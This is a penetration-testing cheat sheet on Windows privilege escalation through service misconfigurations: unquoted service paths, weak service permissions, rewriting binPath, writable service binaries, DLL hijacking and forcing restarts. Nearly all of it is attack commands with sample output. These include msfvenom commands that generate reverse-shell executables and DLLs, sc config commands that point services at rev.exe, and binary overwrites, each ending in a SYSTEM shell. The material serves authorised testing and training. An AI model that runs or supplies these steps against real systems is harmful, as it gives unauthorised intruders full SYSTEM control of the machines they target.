SERVICE MISCONFIGURATIONS
List all services
See all services — Look for non-default services
sc queryex type=service state=all
Get-Service
wmic service list brief
Example Output
sc queryex type=service state=all | findstr /i 'SERVICE_NAME\|DISPLAY_NAME\|STATE'
SERVICE_NAME: CustomSvc
DISPLAY_NAME: Custom Application
STATE: 4 RUNNING
(Find non-default services to investigate)
Unquoted service paths
Paths with spaces, no quotes — C:\Program Files\My App\svc.exe = hijack
wmic service get name,displayname,pathname,startmode | findstr /i /v "C:\Windows"
Example Output
wmic service get name,pathname | findstr /v "C:\Windows"
CustomSvc C:\Program Files\My App\service.exe
Path has spaces + no quotes = hijackable
Place: C:\Program Files\My.exe
Restart service -> runs your exe as SYSTEM
Exploit unquoted path
Windows tries each space as path end — Restart service to trigger
If path: C:\Program Files\My App\service.exe
Place malicious exe at: C:\Program.exe
or: C:\Program Files\My.exe
Example Output
Path: C:\Program Files\My App\service.exe
msfvenom -p windows/x64/shell_reverse_tcp ... -f exe -o 'C:\Program Files\My.exe'
sc stop CustomSvc
sc start CustomSvc
Attacker:
C:\> whoami
nt authority\system
Weak service permissions
Can you modify service config? — Change binPath to your payload
accesschk.exe -uwcqv * /accepteula
or: sc qc <service_name>
Example Output
accesschk.exe -uwcqv 'Everyone' * /accepteula
RW CustomService
SERVICE_ALL_ACCESS
sc config CustomService binPath= 'C:\temp\rev.exe'
sc stop CustomService
sc start CustomService
(Shell as SYSTEM)
Modify service binary path
Point service to your payload — Runs as service account (often SYSTEM)
sc config <service> binPath= 'C:\temp\rev.exe'
sc stop <service>
sc start <service>
Example Output
sc config CustomSvc binPath= 'C:\temp\rev.exe'
[SC] ChangeServiceConfig SUCCESS
sc stop CustomSvc
sc start CustomSvc
Attacker:
C:\> whoami
nt authority\system
Writable service binary
Replace the actual binary — Overwrite with reverse shell
icacls 'C:\path\to\service.exe'
Look for: (F) or (M) for your user
Example Output
icacls C:\custom\svc.exe
BUILTIN\Users:(F) <- FULL CONTROL!
copy C:\temp\rev.exe C:\custom\svc.exe /Y
sc stop CustomSvc
sc start CustomSvc
(Your payload runs as SYSTEM)
DLL hijacking (services)
Service loads missing DLL — DLL runs as service user
Process Monitor: filter for NAME NOT FOUND on .dll
Place malicious DLL in search path
Example Output
Process Monitor filter: Result=NAME NOT FOUND, Path ends with .dll
CustomSvc.exe -> C:\custom\missing.dll NOT FOUND
msfvenom -p windows/x64/shell_reverse_tcp ... -f dll -o C:\custom\missing.dll
Restart service -> shell as SYSTEM
Service restart permissions
Need to trigger the service — Some need admin to restart
sc stop <service>
sc start <service>
or reboot if you can
Example Output
sc stop CustomSvc
[SC] Access denied
Try: shutdown /r /t 0
OR wait for scheduled restart
OR: sc config CustomSvc start=auto
(Service restarts after reboot)